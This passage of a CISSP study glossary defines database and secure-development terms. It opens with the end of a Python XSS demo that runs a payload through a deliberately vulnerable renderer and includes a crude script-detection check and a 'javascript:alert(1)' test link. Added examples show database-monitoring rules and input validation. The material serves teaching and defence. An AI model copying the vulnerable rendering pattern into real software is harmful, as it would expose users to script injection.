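    """Crude check used only to demonstrate the difference between the two renderers."""
    lowered = html.lower()
    return "<script" in lowered or "javascript:" in lowered


if __name__ == "__main__":
    print(render_greeting_vulnerable(PAYLOAD))
    print(render_greeting_safe(PAYLOAD))
    print(render_link_safe("javascript:alert(1)", "click"))
```

Encoding has to match the context the data is inserted into: the body and attribute cases above differ, and JavaScript or URL contexts need their own encoders. A Content Security Policy does not replace encoding; it limits what an injected script can do if an encoding is missed.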
52
# Define: Data Aggregation
Collecting and summarizing data from multiple sources, often used in analytics and business intelligence for informed decision-making. ## Footnote The process of collecting and summarizing information from multiple sources to achieve a consolidated view. Often used in data analytics, business intelligence, and reporting, it allows for more informed decision-making by presenting a comprehensive picture of collected data for analysis. Aggregation can involve compiling detailed data into summary form, computing sums, averages, counts, or other metrics that provide insight into trends, patterns, or performance across datasets. In database security, aggregation also names a risk: combining individually non-sensitive records can reveal information that is sensitive in the aggregate (inference), which is why access controls sometimes have to consider the volume and combination of data a user can retrieve, not just individual records. *For more information, view this lecture on [Database Security](https://courses.thorteaches.com/courses/take/cissp/lessons/19121852-database-security). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Data_aggregation).*
53
# Define: Data Analytics
The process of examining data to extract actionable insights. ## Footnote Data analytics involves the systematic analysis of data using statistical methods, algorithms, and tools to uncover meaningful patterns, trends, and insights. This discipline helps organizations make informed decisions, optimize processes, and gain competitive advantages by transforming raw data into actionable intelligence and strategic foresight. *For more information, view this lecture on [Database Security](https://courses.thorteaches.com/courses/take/cissp/lessons/19121852-database-security). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Data_analytics).*
54
# Define: Data Control Language | (DCL)
SQL syntax managing permissions on database objects, allowing or restricting user actions for secure database access. ## Footnote A type of syntax used in SQL databases that manages permissions on different database objects. DCL commands such as GRANT and REVOKE allow specific roles or users to access or restrict certain actions on the database, ensuring that only authorized individuals have the right level of access to perform their duties. *For more information, visit this [Wikipedia page](https://en.wikipedia.org/wiki/Data_control_language).*
55
# Define: Data Dictionary
A repository detailing data structure, content, and usage, ensuring consistency and aiding in effective data management. ## Footnote A centralized repository of information about data, such as its meaning, relationships to other data, origin, usage, and format. It serves as a guide for understanding the structure, content, and context of data sources, thereby helping ensure consistency across different parts of an organization and facilitating effective data management. *For more information, visit this [Wikipedia page](https://en.wikipedia.org/wiki/Data_dictionary).*
56
# Define: Data Discovery Methods
Processes and tools identifying, classifying, and analyzing data assets, crucial for governance, risk management, and compliance. ## Footnote Data Discovery Methods refer to a range of processes and tools used to identify, classify, and analyze an organization's data assets. They are crucial for data governance, risk management, and compliance, ensuring that sensitive data is properly handled and protected. Techniques include automated discovery using software to scan storage systems and databases, as well as manual reviews and audits. *For more information, visit this [Wikipedia page](https://en.wikipedia.org/wiki/Knowledge_extraction#Knowledge_discovery).*
57
# Define: Data Flow Diagrams | (DFDs)
Visual representations of data flow through an information system, illustrating inputs, processes, and outputs. ## Footnote Graphical representations that illustrate the flow of data through an information system. DFDs map out the inputs, processes, storage, and outputs of data in a system. They are useful tools for visualizing system interactions, identifying potential bottlenecks or vulnerabilities, and for planning and improving system design. They are also the standard starting artifact for threat modeling: trust boundaries drawn on the diagram show where data crosses from one privilege level to another, and therefore where input validation and authentication are required. *For more information, visit this [Wikipedia page](https://en.wikipedia.org/wiki/Data-flow_diagram).*
58
# Define: Data Manipulation Language | (DML)
A subset of SQL used to perform operations on data within a database, including retrieval, insertion, and deletion. ## Footnote A subset of SQL used to retrieve, insert, modify, and delete data in databases. DML includes commands such as SELECT, INSERT, UPDATE, and DELETE, enabling users to manage and manipulate data in relational database management systems. *For more information, view this lecture on [Databases - Part 3](https://courses.thorteaches.com/courses/take/cissp/lessons/36620227-databases-part-3). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Data_Manipulation_Language).*
59
# Define: Data Mapping
Creating data element mappings between different models to ensure accurate data transfers during integration or ETL processes. ## Footnote The process of creating data element mappings between two distinct data models. Data mapping is used as a first step for a wide variety of data integration tasks, including data transformation or data mediation between a data source and a destination. It helps to define how individual data fields are matched from one database to another, ensuring that information is transferred accurately and correctly during system migrations, data consolidation, or ETL (Extract, Transform, Load) processes. It is fundamental in data management and integration activities. *For more information, visit this [Wikipedia page](https://en.wikipedia.org/wiki/Data_mapping).*
60
# Define: Data Modeling
Developing conceptual data structures and specifications, critical for managing data as a resource and designing databases. ## Footnote The process of developing data structures and specifications. It involves creating a conceptual representation of data objects, the associations between different data objects, and the rules governing these associations. This is instrumental in managing data as a resource, promoting data sharing, increasing data consistency, and designing databases. *For more information, visit this [Wikipedia page](https://en.wikipedia.org/wiki/Data_modeling).*
61
# Define: Data Normalization
Decomposing tables in a database to eliminate redundancy and ensure consistency, reducing data anomalies and inconsistencies. ## Footnote A systematic approach of decomposing tables to eliminate data redundancy and undesirable characteristics like insertion, update, and deletion anomalies. The goal of this technique is to reduce and even eliminate data redundancy, an issue that can lead to data anomalies and inconsistencies within databases or data storage systems. *For more information, view this lecture on [Databases - Part 2](https://courses.thorteaches.com/courses/take/cissp/lessons/19182105-databases-part-2). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Database_normalization).*
62
# Define: Data Structure
A format for organizing and storing data in a computer, enabling efficient access and modification, essential for data handling. ## Footnote A specialized format for organizing and storing data in a computer so that it can be accessed and modified efficiently. Different kinds of data structures are suited to different kinds of applications, and some are highly specialized for specific tasks. Data structures can include arrays, linked lists, stacks, queues, trees, graphs, and various types of tables and databases, each with its own strengths and use cases in the realm of computer science and data processing. *For more information, visit this [Wikipedia page](https://en.wikipedia.org/wiki/Data_structure).*
63
# Define: Database
A structured set of data, often managed and accessed through a DBMS, essential for organization and manipulation of information. ## Footnote A structured set of data. It's a collection of schemas, tables, queries, reports, views, and other objects used to manage and organize information efficiently. Databases are essential in many environments as they provide an efficient way to store, retrieve and manipulate data, and can be protected by various security measures like encryption and access controls. *For more information, view this lecture on [Databases - Part 1](https://courses.thorteaches.com/courses/take/cissp/lessons/19182101-databases-part-1). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Database).*
64
# Define: Database Activity Monitoring | (DAM)
A technology monitoring and analyzing database activity in real-time to detect unauthorized actions. ## Footnote A security technology that continuously monitors, records, and analyzes database activity in real-time. DAM is used to detect and prevent unauthorized or malicious actions within databases, alerting security teams to potential threats or policy violations. This technology helps in ensuring database security, compliance with data protection regulations, and operational integrity of database environments. DAM solutions typically provide functionalities such as real-time monitoring, alert generation, transaction log analysis, and automated response mechanisms. *For more information, visit this [Wikipedia page](https://en.wikipedia.org/wiki/Database_activity_monitoring).*
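The kind of rule-based checks a DAM product applies to database audit events, as an added Python example that is not code from the flashcard page or any product. The audit-log format, the sample lines, the DBA account list and the thresholds are all constructed for illustration.

```python
"""Rule-based database activity monitoring over constructed audit events.
Added example, not from the flashcard page; log format, sample lines,
privileged-user list and thresholds are assumptions."""
from datetime import datetime

# Constructed audit log: timestamp | db user | client | statement | rows affected
SAMPLE_LOG = """\
2024-05-01T09:02:11 | app_svc | 10.0.5.20 | SELECT id,email FROM customers WHERE id=42 | 1
2024-05-01T09:02:12 | app_svc | 10.0.5.20 | UPDATE orders SET status='paid' WHERE id=9 | 1
2024-05-01T09:05:40 | app_svc | 10.0.5.20 | SELECT * FROM customers | 250000
2024-05-01T23:41:03 | jdoe | 10.0.9.77 | GRANT ALL ON customers TO jdoe | 0
2024-05-01T23:41:30 | jdoe | 10.0.9.77 | SELECT name,ssn FROM customers | 250000
2024-05-01T10:15:00 | dba_ops | 10.0.1.5 | REVOKE ALL ON customers FROM jdoe | 0
"""

PRIVILEGED_USERS = {"dba_ops"}           # assumed DBA accounts allowed to run DCL
BULK_ROW_THRESHOLD = 10_000              # assumed per-statement row limit
BUSINESS_HOURS = range(8, 19)            # 08:00 to 18:59, assumed
DCL_KEYWORDS = ("GRANT", "REVOKE", "ALTER USER", "CREATE USER")


def parse(line: str) -> dict:
    ts, user, client, stmt, rows = [p.strip() for p in line.split("|")]
    return {"ts": datetime.fromisoformat(ts), "user": user, "client": client,
            "stmt": stmt, "rows": int(rows)}


def analyze(log_text: str) -> list[str]:
    """Return one alert string per rule hit; a single event can trip several."""
    alerts = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ev = parse(line)
        upper = ev["stmt"].upper()
        # Rule 1: privilege changes by anyone outside the DBA group.
        if upper.startswith(DCL_KEYWORDS) and ev["user"] not in PRIVILEGED_USERS:
            alerts.append(f"DCL by non-DBA {ev['user']}: {ev['stmt']}")
        # Rule 2: bulk reads (possible exfiltration), whoever runs them,
        # including the application's own account if it is compromised.
        if upper.startswith("SELECT") and ev["rows"] >= BULK_ROW_THRESHOLD:
            alerts.append(f"bulk read of {ev['rows']} rows by {ev['user']}")
        # Rule 3: after-hours activity by a named (non-service) account.
        if ev["ts"].hour not in BUSINESS_HOURS and not ev["user"].endswith("_svc"):
            alerts.append(f"after-hours access by {ev['user']} from {ev['client']}")
    return alerts


if __name__ == "__main__":
    for a in analyze(SAMPLE_LOG):
        print(a)
```

Real products read this data from native audit logs or by inspecting database traffic, and usually baseline normal volumes per user rather than using a fixed threshold; the three rules here are the shape of the logic, not a tuned ruleset.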
65
# Define: Database Administrator | (DBA)
A professional managing databases, ensuring data availability and security, and performing maintenance tasks. ## Footnote A professional responsible for the installation, configuration, upgrade, administration, monitoring, and maintenance of databases in an organization. The DBA ensures data availability, security, and integrity and is often involved in disaster recovery, performance analysis, and optimization, along with managing database access roles and permissions. *For more information, view this lecture on [Databases - Part 1](https://courses.thorteaches.com/courses/take/cissp/lessons/19182101-databases-part-1). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Database_administrator).*
66
# Define: Database Management System | (DBMS)
Software that catalogs and queries data, managing incoming data and organizing it for users or other programs. ## Footnote A software system that uses a standard method of cataloging, retrieving, and running queries on data. The DBMS manages incoming data, organizes it, and provides ways for the data to be modified or extracted by users or other programs. DBMSs are a crucial tool for handling large amounts of data across different industries and are central to the fields of databases and information systems. Examples include relational databases like MySQL, PostgreSQL, and Microsoft SQL Server, as well as NoSQL databases like MongoDB and Cassandra. *For more information, view this lecture on [Databases - Part 1](https://courses.thorteaches.com/courses/take/cissp/lessons/19182101-databases-part-1). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Database_management_system).*
67
# Define: Database Replication
Maintaining copies of databases on multiple systems to ensure availability and durability, aiding resilience against failures or breaches. ## Footnote A technique that involves maintaining copies of the same database on multiple computer systems. This is done not only to ensure data availability and durability but also as a measure of resilience in the face of technical failures or data breaches. If one server or database is lost or compromised, operations can continue using the replicated databases, minimizing disruption and data loss. Replication is not a substitute for backups, however: a malicious or erroneous change is replicated just as faithfully as a legitimate one, so point-in-time backups, and tested restores, are still required to recover from data corruption or ransomware. *For more information, visit this [Wikipedia page](https://en.wikipedia.org/wiki/Replication_(computing)#Database_replication).*
68
# Define: Database System Vulnerabilities
Weaknesses in database systems that can be exploited to access or manipulate data, requiring identification and mitigation. ## Footnote The weaknesses in a database system that can be exploited by malicious actors to gain unauthorized access, disrupt operations, or manipulate data. Such vulnerabilities could stem from a variety of factors, including but not limited to software bugs, improper configurations, weak security controls, or lack of timely updates and patches. Identifying and mitigating these vulnerabilities is crucial in protecting the data held within the database system. *For more information, view this lecture on [Software vulnerabilities and Attacks.](https://courses.thorteaches.com/courses/take/cissp/lessons/19182134-software-vulnerabilities-and-attacks)*
69
# Define: Decision Support Systems | (DSS)
Interactive applications providing data and tools to support decision-making, improving organizational efficiency. ## Footnote The interactive software applications used to help individuals or organizations make decisions by providing relevant data, models, or analytical tools. These systems are employed across various sectors and can help improve efficiency and accuracy in decision-making, ensuring the best possible outcomes based on the information available. *For more information, visit this [Wikipedia page](https://en.wikipedia.org/wiki/Decision_support_system).*
70
# Define: Deepfake
A Deepfake is a synthetic media creation, often video or audio, generated using AI techniques like deep learning to imitate real people’s appearances, voices, or behaviors convincingly. ## Footnote Deepfakes exploit advanced generative models—especially Generative Adversarial Networks (GANs)—to engineer highly realistic facial expressions or speech patterns. They can be used for entertainment, satire, or malicious activities, such as disinformation campaigns or blackmail. Detecting deepfakes involves analyzing subtle artifacts, inconsistencies in lighting, or unnatural blinking. Tech companies and researchers are developing and refining deepfake detection tools, while governments consider legal regulations to mitigate the risks of deception and reputational harm. *For more information, visit this [Wikipedia page](https://en.wikipedia.org/wiki/Deepfake).*
71
# Define: DevOps
A methodology integrating software development and operations to reduce development time and enhance quality. ## Footnote A methodology that combines software development (Dev) and operations (Ops) with the aim of reducing the system development life cycle while delivering high-quality software and improving operational performance. DevOps fosters continuous integration, continuous deployment, and continuous monitoring in software development and operations, enabling quicker responses to changes and problems. *For more information, view this lecture on [DevOps and DevSecOps](https://courses.thorteaches.com/courses/take/cissp/lessons/29669508-devops-and-devsecops). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/DevOps).*
72
# Define: DevSecOps
An approach that incorporates security into the DevOps process, including during software development phases. ## Footnote An extension of the DevOps methodology, this approach integrates security into the development and operation processes. It advocates for security considerations and controls to be included from the initial stages of software development rather than being an afterthought or standalone phase. It underscores a "security as code" culture with ongoing, flexible collaboration between release engineers and security teams. *For more information, view this lecture on [DevOps and DevSecOps](https://courses.thorteaches.com/courses/take/cissp/lessons/29669508-devops-and-devsecops). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/DevSecOps).*
73
# Define: DFDs | (Data Flow Diagrams)
Representations of data flow through systems, showing how information is handled and processed. ## Footnote Graphical representations of the flow of data through an information system. They map out the data inputs, processing steps, data storage, and output processes involved in handling data. DFDs are used for system analysis and design and can help in understanding the complexities of systems, ensuring that all components are well-integrated and that the system functions as intended. They are particularly useful in visualizing data exchange within and between systems, aiding in error detection, and enhancing communication among stakeholders. *For more information, visit this [Wikipedia page](https://en.wikipedia.org/wiki/Data-flow_diagram).*
74
# Define: Dynamic Analysis
Testing software behavior in real-time by executing programs to identify defects or vulnerabilities during operation. ## Footnote A method used in software testing where programs are executed in real-time to identify potential defects or errors. Unlike static analysis, which is performed without running the code, dynamic analysis tests the software's behavior under various conditions and inputs to find issues such as memory leaks, race conditions, or security vulnerabilities. It is an essential part of the quality assurance process, being able to simulate actual operating conditions and user interactions. *For more information, view this lecture on [SCA - Software Composition Analysis](https://courses.thorteaches.com/courses/take/cissp/lessons/54399265-new-2024-sca-software-composition-analysis). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Dynamic_program_analysis).*
75
# Define: Dynamic Link Libraries | (DLLs)
Files containing code and data used simultaneously by multiple applications, essential for code reuse and memory efficiency. ## Footnote Modular files containing code and data that can be used by multiple applications simultaneously. DLLs allow for code reuse, modularization, and memory efficiency, as the same library can serve multiple applications, reducing the need for redundant code. Their misuse or manipulation can lead to vulnerabilities such as DLL hijacking and DLL injection. In search-order hijacking, an application loads a library by bare file name and an attacker places a same-named DLL earlier in the search path (for example, in the application's own directory or a writable directory on PATH), so the malicious library is loaded instead of the intended one; mitigations include loading libraries by fully qualified path, restricting the search path, and verifying library signatures. *For more information, visit this [Wikipedia page](https://en.wikipedia.org/wiki/Dynamic-link_library).*
76
# Define: Eastbound Interface API
APIs that connect peer network controllers so they can exchange state and coordinate across domains; controller-to-application communication is the northbound interface. ## Footnote In Software-Defined Networking (SDN), interfaces are named by their direction relative to the controller. Southbound APIs (such as OpenFlow) talk to the switches and routers; northbound APIs expose network information, such as topology details or traffic statistics, to higher-level management systems, orchestration platforms, and business applications for analytics, policy decisions, and service orchestration; and eastbound/westbound APIs link controllers to each other, so that multiple controllers (for example, in different domains or deployed for high availability) can share topology and policy state. Because the east/west channel carries control-plane state between controllers, it should be mutually authenticated and encrypted: a compromised or impersonated peer could otherwise inject routes or policy into the whole fabric.
77
# Define: East-West APIs
Facilitate internal communication and data exchange within an IT infrastructure, optimizing information flow. ## Footnote These APIs facilitate internal communications and data exchange between services and applications within an organization's IT infrastructure. Focused on optimizing the flow of information within the data center, East-West APIs are crucial for microservices architectures and containerized applications, where a high volume of internal traffic is common. Because this traffic never crosses the network perimeter, it is easy to leave unauthenticated and unencrypted, which is exactly what an attacker relies on for lateral movement after an initial foothold; mutual TLS (often provided by a service mesh) and microsegmentation apply the same controls to internal APIs as to external ones.
78
# Define: Edit Control
A mechanism to ensure input data adheres to defined formats and conditions before system processing, enhancing data accuracy and consistency. ## Footnote A mechanism used to validate the input data in a system. Edit control ensures that the data entered into a system adheres to predefined formats, ranges, or conditions before it is processed. This is important in maintaining the accuracy and consistency of the data and preventing the introduction of errors or anomalies that could lead to security vulnerabilities or incorrect system operation.
79
# Define: Error and Exception Handling
Processes in software systems to manage unexpected conditions, preserving system stability and data integrity when errors occur. ## Footnote The mechanisms and processes put in place in software systems to manage errors and exceptions. These mechanisms aim to gracefully handle unexpected or abnormal conditions (exceptions) that arise during a program's execution, thereby preserving system stability and data integrity. This could involve logging errors for further analysis, displaying user-friendly error messages, or recovering from an error state. Handlers should fail securely: full details are logged internally for analysis, but only generic messages are returned to users, since stack traces, SQL fragments, or internal hostnames in error output help attackers map the system, and an unhandled exception must not leave the application in a half-completed or unexpectedly permissive state. *For more information, visit this [Wikipedia page](https://en.wikipedia.org/wiki/Exception_handling).*
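Edit control (the previous card) and fail-secure exception handling (this card) belong together in practice: input is validated before any business logic sees it, and whatever still fails is logged in full but reported generically. The Python below is an added example, not code from the flashcard page or the linked course; the transfer record format, the limits, and the simulated ledger failure are assumptions.

```python
"""Edit control (input validation) followed by fail-secure error handling.
Added example, not from the flashcard page; record format, limits and the
simulated ledger failure are assumptions."""
import logging
import re
from dataclasses import dataclass
from datetime import date

log = logging.getLogger("payments")
logging.basicConfig(level=logging.INFO)

ACCOUNT_RE = re.compile(r"[0-9]{8,12}")   # assumed account-number format
MAX_AMOUNT_CENTS = 1_000_000              # assumed per-transfer ceiling


class ValidationError(ValueError):
    """Raised when a field fails an edit check; the message is safe to show."""


@dataclass(frozen=True)
class Transfer:
    account: str
    amount_cents: int
    value_date: date


def validate_transfer(raw: dict) -> Transfer:
    """Format, range and date edits run before any business logic sees the data."""
    account = str(raw.get("account", "")).strip()
    if not ACCOUNT_RE.fullmatch(account):
        raise ValidationError("account must be 8-12 digits")
    try:
        amount = int(raw.get("amount_cents", ""))
    except (TypeError, ValueError):
        raise ValidationError("amount must be an integer number of cents") from None
    if not 0 < amount <= MAX_AMOUNT_CENTS:
        raise ValidationError("amount out of range")
    try:
        value_date = date.fromisoformat(str(raw.get("value_date", "")))
    except ValueError:
        raise ValidationError("value_date must be YYYY-MM-DD") from None
    if value_date < date(2000, 1, 1):
        raise ValidationError("value_date too far in the past")
    return Transfer(account, amount, value_date)


def post_transfer(transfer: Transfer) -> str:
    """Stand-in for the real ledger; accounts starting with 0 simulate an
    internal failure whose message contains details a client must not see."""
    if transfer.account.startswith("0"):
        raise RuntimeError("ledger shard 0 unreachable (host db-0.internal)")
    return f"posted {transfer.amount_cents} to {transfer.account}"


def handle_request(raw: dict) -> tuple[int, str]:
    """Map outcomes to (status, message). Validation failures go back to the
    caller verbatim because they are written to be safe; internal failures are
    logged with full context but answered with a generic message, so hostnames,
    stack traces and SQL never reach the client."""
    try:
        transfer = validate_transfer(raw)
    except ValidationError as exc:
        return 400, str(exc)
    try:
        return 200, post_transfer(transfer)
    except Exception:
        log.exception("transfer failed for account ending %s", transfer.account[-4:])
        return 500, "internal error; details have been logged"


if __name__ == "__main__":
    print(handle_request({"account": "12345678", "amount_cents": "500", "value_date": "2024-05-01"}))
    print(handle_request({"account": "12ab", "amount_cents": "500", "value_date": "2024-05-01"}))
    print(handle_request({"account": "01234567", "amount_cents": "500", "value_date": "2024-05-01"}))
```

Two details carry the security point: the edit checks are allow-lists (a digit pattern, a numeric range, a parsed date) rather than searches for known-bad input, and the 500 branch catches the broad `Exception` only after the narrow, expected `ValidationError` has been handled, so the generic message is the only thing an attacker can learn from a failure they induce.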
80
# Define: Executable Code
A set of instructions currently running or ready to be executed by a computer's processor, performing specific system tasks. ## Footnote This refers to a set of instructions in a computer program that is currently being executed or is ready to be run by a computer's processor. Executable code can come in various forms, such as binary executable files, scripts, or sequences of instructions interpreted by an interpreter. It typically resides within an executable file, which can be a standalone program or part of a larger application, and is responsible for performing specific tasks or operating various functions within a software environment. *For more information, visit this [Wikipedia page](https://en.wikipedia.org/wiki/Executable).*
81
# Define: Expert System
An AI system using knowledge-based rules to emulate human decision-making, often in specialized fields like medicine. ## Footnote A branch of artificial intelligence that uses a knowledge-based system to emulate the decision-making ability of a human expert. Expert systems are designed to solve complex problems by reasoning through bodies of knowledge, represented mainly as if-then rules rather than through conventional procedural code. They are often used to provide answers to questions, solve problems, or give advice in specialized fields like medicine, engineering, or finance. Expert systems use a 'knowledge base' and an 'inference engine' to simulate human expertise and derive conclusions. *For more information, view this lecture on [Artificial Intelligence (AI)](https://courses.thorteaches.com/courses/take/cissp/lessons/19182149-artificial-intelligence-ai). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Expert_system).*
82
# Define: eXtensible Markup Language | (XML)
A text format for structuring and transporting data, both human and machine-readable, widely used in web services. ## Footnote A flexible text-based format derived from SGML (Standard Generalized Markup Language) that is used to store and transport data. XML provides a way to structure data so that it can be both human and machine-readable. It is widely used for the representation of arbitrary data structures, such as those used in web services. XML is extensible because it allows users to define their own elements. Its purposes include but are not limited to, describing data, encoding documents, and serializing complex data structures across network connections. *For more information, view this lecture on [Web architecture and attacks](https://courses.thorteaches.com/courses/take/cissp/lessons/19148725-web-architecture-and-attacks). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/XML).*
83
# Define: Extreme Programming | (XP)
A software development methodology focused on improving quality and responding to customer requirements. ## Footnote A software development methodology that is intended to improve software quality and responsiveness to changing customer requirements. As a type of agile software development, XP advocates frequent "releases" in short development cycles, which are intended to improve productivity and introduce checkpoints where new customer requirements can be adopted. Key practices include pair programming, extensive code review, unit testing of all code, and a flat management structure. The aim of XP is to enhance software project adaptability and reduce risks associated with client requirements changing during the software development process. *For more information, view this lecture on [Software development methodologies part 2](https://courses.thorteaches.com/courses/take/cissp/lessons/19182096-software-development-methodologies-part-2). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Extreme_programming).*
84
# Define: File Layout
The organization of data within a file, which determines how it’s read, interpreted, and processed, crucial for data integrity. ## Footnote The structure and organization of data within a file. The layout can dictate how data is read, interpreted, and processed, and it often depends on the file format. Managing file layouts properly can have implications for data integrity and accuracy. For example, changing a file layout without adjusting the related processes can lead to misinterpretation of the data and potentially severe consequences.
85
# Define: Foreign Key
A field in a database table that links to the primary key of another table, enforcing referential integrity. ## Footnote In databases, a foreign key is a column or set of columns in a relational database table that provides a link between data in two tables. It refers to the primary key of another table, establishing a relationship between the two tables and enforcing referential integrity. The foreign key identifies a column or a set of columns in one (referencing) table that matches the primary key or a unique key in another (referenced) table. The relationship between the two keys ensures that the data in the two tables remains consistent. *For more information, view this lecture on [Databases - part 1](https://courses.thorteaches.com/courses/take/cissp/lessons/19182101-databases-part-1). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Foreign_key).*
86
# Define: Fourth-Generation Language | (4GL)
High-level programming languages closer to human language, aimed at solving business problems or data queries. ## Footnote These are types of programming languages that are more abstract and closer to human language compared to third-generation languages. 4GLs often focus on reducing programming effort and specificity and are geared towards solving business problems or database querying. Examples include SQL (Structured Query Language) for database interactions, ABAP (Advanced Business Application Programming) used in SAP applications, Informix-4GL, and Progress 4GL, now known as OpenEdge Advanced Business Language. They enable developers to write code with higher-level constructs, and many provide capabilities for rapid application development, report generation, and data manipulation. *For more information, view this lecture on [Programming Concepts - Part 1](https://courses.thorteaches.com/courses/take/cissp/lessons/19182075-programming-concepts-part-1). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Fourth-generation_programming_language).*
87
# Define: Freeware
Software available at no cost, often proprietary and supported by advertisements, donations, or as an entry-level product version. ## Footnote Software that is available for use at no monetary cost, typically distributed with a license that allows users to download, install, and utilize the software without any payment. Freeware may be proprietary, with the source code not available for modification or redistribution by users. It is often supported by voluntary donations, advertisements, or as a strategy to entice users to purchase a more capable paid version. Unlike open-source software, the rights to copy, modify, and redistribute freeware are usually restricted by the developer. Popular examples of freeware include Adobe Reader and Skype. *For more information, view this lecture on [Programming Concepts - Part 2](https://courses.thorteaches.com/courses/take/cissp/lessons/36454825-programming-concepts-part-2). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Freeware).*
88
# Define: Graphical User Interface | (GUI)
A user interface using visual elements for interaction, making systems user-friendly for non-technical users. ## Footnote A type of user interface that uses visual elements, such as icons and menus, to interact with a computer or device. It is used to make computer systems more user-friendly and intuitive, especially for non-technical users. Examples include using a GUI to access and manage files on a computer or to navigate and control a smartphone or tablet. *For more information, view this lecture on [Secure Communications - Part 2](https://courses.thorteaches.com/courses/take/cissp/lessons/29462724-secure-communications-part-2). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Graphical_user_interface).*
89
# Define: Hierarchical Database
A database organizing data into a tree structure, efficient for storing hierarchical data like organizational charts. ## Footnote A type of database that organizes data into a tree-like structure, with each record in the database having a single parent record and potentially multiple child records. It is commonly used in applications that need to store and retrieve hierarchical data, such as an organizational chart or a family tree. Examples include storing employee data in a hierarchical database to easily track reporting relationships or using a hierarchical database to store and retrieve genealogical data. *For more information, view this lecture on [Databases - part 3](https://courses.thorteaches.com/courses/take/cissp/lessons/36620227-databases-part-3). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Hierarchical_database_model).*
90
# Define: High-Level Languages
Programming languages with abstract syntax closer to human language, like Python and Java, used for complex programs. ## Footnote Programming languages that use a more abstract and human-readable syntax, as opposed to low-level languages that use machine-readable instructions. They are commonly used by software developers to write complex programs or applications, as they are easier to read and understand than low-level languages. Examples include popular high-level languages such as Python, Java, and C++. *For more information, view this lecture on [Programming Concepts - Part 1](https://courses.thorteaches.com/courses/take/cissp/lessons/19182075-programming-concepts-part-1). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/High-level_programming_language).*
91
# Define: Implement
Putting plans or decisions into effect, often involving configuration and integration of hardware or software. ## Footnote The process of putting a plan or decision into effect, often involving the setup, configuration, and integration of hardware, software, or protocols. In the context of security, implementation could involve the application of a new policy, the installation of a new security system, or the enforcement of a security standard across an organization. Proper implementation is crucial to ensure the effectiveness of security measures and minimize potential vulnerabilities. *Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Implementation#Information_technology).*
92
# Define: Implementation Life Cycle Review
Evaluating a project during and after implementation to ensure security measures are effective and updated. ## Footnote The critical examination of a project or system at different stages of its life cycle, specifically during and after the implementation phase. The goal is to evaluate the project's adherence to planned specifications, assess the quality of work, and identify potential issues. In security-related projects, these reviews help ensure that the security measures are correctly implemented, effective, and updated to meet evolving threats and standards.
93
# Define: Injection
A type of cyber-attack involving the insertion of malicious code into a system to gain unauthorized access or control. ## Footnote A type of cyber-attack that involves injecting malicious code into a system or application to gain access or control. Recognizing this attack class helps security teams identify and prevent attempts to inject malicious code into a system or application. Examples include SQL injection, cross-site scripting, and command injection. *For more information, view this lecture on [OWASP 2021 - part 1](https://courses.thorteaches.com/courses/take/cissp/lessons/19182115-owasp-part-1). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Code_injection).*
94
# Define: Input Validation
The verification of user-submitted data to prevent errors or vulnerabilities such as SQL injection and cross-site scripting. ## Footnote The process of checking and verifying user input to ensure it is in the correct format and meets the specified criteria. It is used in computer programming and system administration to prevent errors and unauthorized access. Examples include data type checking, range checking, and regex matching. *For more information, view this lecture on [OWASP 2021 - part 2](https://courses.thorteaches.com/courses/take/cissp/lessons/19182128-owasp-part-2). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Data_validation).*
95
# Define: Inputs and Outputs
Data received and produced by a system or process, important for identifying correct and secure data handling. ## Footnote The inputs of a system or process are the data it receives and processes; the outputs are the results it produces. Defining both is a core step in computer programming and system design. Examples include user input, system output, and error messages. *For more information, visit this [Wikipedia page](https://en.wikipedia.org/wiki/Input/output).*
96
# Define: Insecure Direct Object Access
A vulnerability that occurs when direct access to objects in an application is not securely protected. ## Footnote Insecure Direct Object References (IDOR) occur when an application provides direct access to objects based on user-supplied input. This vulnerability allows attackers to bypass authorization and access resources within the system by manipulating reference values. IDOR can lead to unauthorized data exposure, data modification, or execution of operations with objects such as files, database keys, or URLs. *For more information, visit this [Wikipedia page](https://en.wikipedia.org/wiki/Insecure_direct_object_reference).*
97
# Define: Insecure Direct Object Reference
An insecure direct object reference (IDOR) happens when an application exposes internal references (e.g., database IDs) to unauthorized users, enabling them to access or manipulate data. ## Footnote Attackers can exploit predictable resource names or keys to retrieve or modify records that are supposed to be restricted. For example, changing a userID in a URL could reveal another user’s details. Preventing IDOR involves enforcing proper authorization checks, obfuscating references, and validating each request. Safeguarding object references is key to protecting sensitive data and preventing privilege escalation. *For more information, view this lecture on [OWASP 2021 - part 2](https://courses.thorteaches.com/courses/take/cissp/lessons/19182128-owasp-part-2). Or visit this [Wikipedia page](https://en.wikipedia.org/wiki/Insecure_direct_object_reference).*
98
# Define: Instruction Set
The collection of commands a processor can execute, defining its capabilities and how it interacts with software. ## Footnote The set of instructions that a computer or processor can execute. It is used in computer architecture and programming to define the capabilities and limitations of a system or processor. Examples include arithmetic and logical operations, memory access, and control flow. *For more information, visit this [Wikipedia page](https://en.wikipedia.org/wiki/Instruction_set).*
99
# Define: Integrated Development Environment | (IDE)
